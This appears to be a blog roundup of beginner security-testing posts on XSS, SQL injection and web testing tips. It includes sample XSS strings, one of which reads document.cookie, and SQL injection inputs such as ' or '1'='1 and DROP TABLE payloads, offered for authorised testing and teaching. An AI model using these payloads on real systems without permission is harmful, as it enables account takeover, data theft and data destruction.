Security testing – revisited

This blog (security testing revisited) is intended to summarize  few of my post related to security testing :-

  1. Ethical Hacking – part 1 – 

    Before going into details of how to ethical hacking we should be clear of what it is. What is ethical hacking? ….

  2. Ethical Hacking – part 2

    In this part we will go a step further in to ethical hacking and discuss how to do Penetration testing. Warning: Proceed only after permission from network owner else it will be treated as hacking….

  3. What is Cross-Site Scripting?

    What is Cross-Site Scripting (XSS)? Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise trusted web sites….

  4. SQL Injection

    SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed SQL command to the database. ….

  5. Security Testing tips

    What is Security testing? Security testing is a process to determine that an information system protects data and maintains functionality as intended. It is the process that determines that confidential data stays confidential and users can perform only those tasks that they are authorized to perform….

     

What is Cross-Site Scripting?

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
XSS attacks can generally be categorized into two categories:
  • Stored XSS Attacks –

Injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log or comment field. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

  1. Hijacking another user’s browser
  2. Capturing sensitive information viewed by application users
  3. Pseudo defacement of the application
  4. Port scanning of internal hosts (“internal” in relation to the users of the web application)
  5. Directed delivery of browser-based exploits
  6. Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a
stored XSS.

  • Reflected XSS Attacks –

Injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a “trusted” server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS.

Testing for XSS Vulnerability

XSS flaws can be difficult to identify and remove from a web application. The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Every data entry point can result in an XSS attack.
Enter following  script
 <IMG SRC=javascript:alert('XSS')>

A browser pop-up titled “XSS” might come up if not dealing with XSS correctly.

<body onload=alert('test1')> 
<b onmouseover=alert('Wufff!')>click me!</b> 
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

Tools for testing XSS vulnerability

  • Burp Suite
  • XSS-Me

We will cover the details of the tools in future posts.

 

What is the difference between vulnerability and exploit?

Vulnerability is a flaw in a system or in some software in a system that could provide an attacker with a way to bypass the security infrastructure of the host operating system or of the software itself. It isn’t an open door but rather a weakness which if attacked could provide a way in.

Exploiting is the act of trying to turn vulnerability (a weakness) into an actual way to breach a system. Vulnerability can therefore be ‘exploited’ to turn it into viable method to attack a system.

In software, the most common type of vulnerability is a memory error. These can be buffer overflows, heap corruptions or NULL pointer de-references. Once a memory issue has been discovered an attacker will try to exploit it by manipulating how the memory is corrupted in the hope to alter some aspect of the addressing (maybe a return address). This can then be used to make the CPU run code in another part of memory. If arbitrary code execution is achieved then the system can be exploited. The extent of the exploit will depend on the nature of the vulnerability.

SQL Injection

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed SQL command to the database. SQL injection is a code injection technique that exploits a security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.

As per Wikipedia, different class of SQL Injection attack (SQLIA) are as follows:

  • Classic SQLIA
  • Inference SQL injection
  • Interacting with SQL injection
  • Database management system-specific SQLIA
  • Compounded SQLIA
  • SQL injection + insufficient authentication
  • SQL injection + DDoS attacks
  • SQL injection + DNS hijacking
  • SQL injection + XSS

SQL Injection types are as follows:

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. These results in the potential manipulation of the statements performed on the database by the end-user of the application.

Following example explains this vulnerability:

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code gets details of specified username from users table. A hacker or malicious user can modify the userName variable to execute some unintended SQL queries.  For example setting the user name variable as

' or '1'='1

or

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

On using above in userName field, it will render following SQL queries:

SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name= '' OR '1'='1' -- ';

This example could be used to force the selection of a valid username because the evaluation of ‘1’=’1′ is always true.

Consider another example:

Following value in userName field will cause deletion of users table as well as select data from users for all users.

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

This code translates to

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

 

Incorrect type handling 

This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric.

e.g. statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"

It is clear from this statement that the author intended a_variable to be a number correlating to the “id” field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to

1;DROP TABLE users

will drop (delete) the “users” table from the database, since the SQL would be rendered as follows:

SELECT * FROM userinfo WHERE id=1;DROP TABLE users;

 

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page

One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen.

For example if a website uses query string to determine the user data to display like

http://users.test.com/showuserdetails.axpx?ID=1001

This may run following query in the server

SELECT * FROM users WHERE ID = '1001';

A hacker can load following urls

http://users.test.com/showuserdetails.axpx?ID=1001  AND 1=1 and
http://users.test.com/showuserdetails.axpx?ID=1001  AND 1=2

these may result in following queries

SELECT * FROM bookreviews WHERE ID = '5' AND '1'='1';
SELECT * FROM bookreviews WHERE ID = '5' AND '1'='2';

A hacker may make similar changes to get more and more information.

 

Manual SQL Injection testing checklist

  1. Test the size and data type of input and make sure appropriate limits is enforced. This can help prevent deliberate buffer overruns.
  2. Test the content of string variables and make sure only expected values are accepted.Binary data, escape sequences, and comment characters should be rejected. This can help prevent script injection and can protect against some buffer overrun exploits.
  3. When testing XML documents, validate that all data against its schema as it is entered.
  4. Test that Transact-SQL statements are never directly built from user input.
  5. Make sure following input characters are rejected wherever possible
Input character Meaning in Transact-SQL
; Query delimiter.
Character data string delimiter.
Comment delimiter.
/* … */ Comment delimiters. Text between /* and */ is not evaluated by the server.
xp_ Used at the start of the name of catalog-extended stored procedures, such as xp_cmdshell.

 

 

Security testing tips

This post is in continuation of my earlier post on security testing.  Before I move into details of security testing here are few tips for beginners and some browser add-on that can help in security testing.

 

Security testing tips:-

  • Directory listing is enabled or disabled –  You can see if it is enabled or disabled by browsing into some directory, Example: http://example.com/images/ — If this directory lists all the image files in the directory then the directory listing is enabled. If it gives a message like “Directory listing denied” or there are no results even though there are files in it then it means it is disabled. If it is enabled then there might be a problem.
  • HTML tags execution – You can check this on any of the text fields. Example: type <h1>Rakesh</h1> in the First Name text field and save the page. If you see that my name is appearing in <h1> font size in “Welcome, Rakesh” text which means there is no validation being done which is security vulnerability as even the <script> tag could be executed resulting in XSS (Cross-site scripting) attack.
  • Bypassing the mandatory fields – You can use Firebug add-on for Firefox to use this technique.
    1. Install Firebug add-on
    2. Press F12 (Windows) key to invoke Firebug
    3. Use Inspect Element feature to highlight the mandatory field
    4. The code gets highlighted when you inspect the UI element
    5. Just delete the code for that mandatory field
    6. Submit the form

If the form gets submitted, then it means that there is no validation on the server end or database end for the mandatory data. If it does not and gives you an error message then it means it does validation on both the ends.

  • Token generation – When you initiate Forgot Password you will receive an e-mail with token, this token should not always be the same but, should randomly be generated every time and the length of the token should not be too short that it could be cracked. The token should expire once used and also there should be maximum hours when the token gets expired even when it’s not used. This applies even for registration token and any other modules where tokens are used.
  • Robots.txt –When a website is asking the bots to not index specific pages, then robots.txt is used. Sometimes this might help you getting to know the URL of admin page or any confidential information pages.
  • Account Lockout Policy – This is important for any login function. Different products have different account lockout policies. Example: Bank account might have 3 attempts. Most of the products do not have this policy but in my opinion it is required for any login function. Forgot Password can get a user the password in case if they forgot it, so why not have an account lockout policy to ensure brute force attacks cannot be employed by any attacker.

 

Some of the Firefox add-on is depicted in the following mind map.

Security testing Firefox addon

Security Testing – What is Security testing?

What is Security testing?

Security testing is a process to determine that an information system protects data and maintains functionality as intended. It is the process that determines that confidential data stays confidential and users can perform only those tasks that they are authorized to perform. Security testing covers confidentiality, integrity, authentication, availability, authorization and non-repudiation.

Confidentiality – A security measure which protects against the disclosure of information to parties other than the intended recipient that is by no means the only way of ensuring the security.

Integrity- A measure intended to allow the receiver to determine that the information which it is providing is correct. Integrity schemes often use some of the same underlying technologies as confidentiality schemes, but they usually involve adding additional information to a communication to form the basis of an algorithmic check rather than the encoding all of the communication.

Authentication-This might involve confirming the identity of a person, tracing the origins of an artifact, ensuring that a product is what its packaging and labeling claims to be, or assuring that a computer program is a trusted one.

Authorization- The process of determining that a requester is allowed to receive a service or perform an operation. Access control is an example of authorization…….

Availability-Assuring information and communications services will be ready for use when expected. Information must be kept available to authorized persons when they need it.

Non-repudiation- In reference to digital security, nonrepudiation means to ensure that a transferred message has been sent and received by the parties claiming to have sent and received the message. Nonrepudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.

Given enough time and resources, good security testing will ultimately penetrate a system.

There are some questions that need to be answered before diving deep into security testing. These are as follows:

What is “Vulnerability”?

What is “URL manipulation”?

What is “SQL injection”?

What is “XSS (Cross Site Scripting)”?

What is “Spoofing”?

 

To know more on security testing tips click here.

 

 

Security Testing

Security Testing

What is Security testing?

Security testing is a process to determine that an information system protects data and maintains functionality as intended. It is the process that determines that confidential data stays confidential and users can perform only those tasks that they are authorized to perform. Security testing covers confidentiality, integrity, authentication, availability, authorization and non-repudiation.

Confidentiality – A security measure which protects against the disclosure of information to parties other than the intended recipient that is by no means the only way of ensuring the security.

Integrity- A measure intended to allow the receiver to determine that the information which it is providing is correct. Integrity schemes often use some of the same underlying technologies as confidentiality schemes, but they usually involve adding additional information to a communication to form the basis of an algorithmic check rather than the encoding all of the communication.

Authentication-This might involve confirming the identity of a person, tracing the origins of an artifact, ensuring that a product is what its packaging and labeling claims to be, or assuring that a computer program is a trusted one.

Authorization- The process of determining that a requester is allowed to receive a service or perform an operation.
Access control is an example of authorization…….

Availability-Assuring information and communications services will be ready for use when expected. Information must be kept available to authorized persons when they need it.

Non-repudiation- In reference to digital security, nonrepudiation means to ensure that a transferred message has been sent and received by the parties claiming to have sent and received the message. Nonrepudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.

Given enough time and resources, good security testing will ultimately penetrate a system.

There are some questions that need to be answered before diving deep into security testing. These are as follows:

What is “Vulnerability”?
What is “URL manipulation”?
What is “SQL injection”?
What is “XSS (Cross Site Scripting)”?
What is “Spoofing”?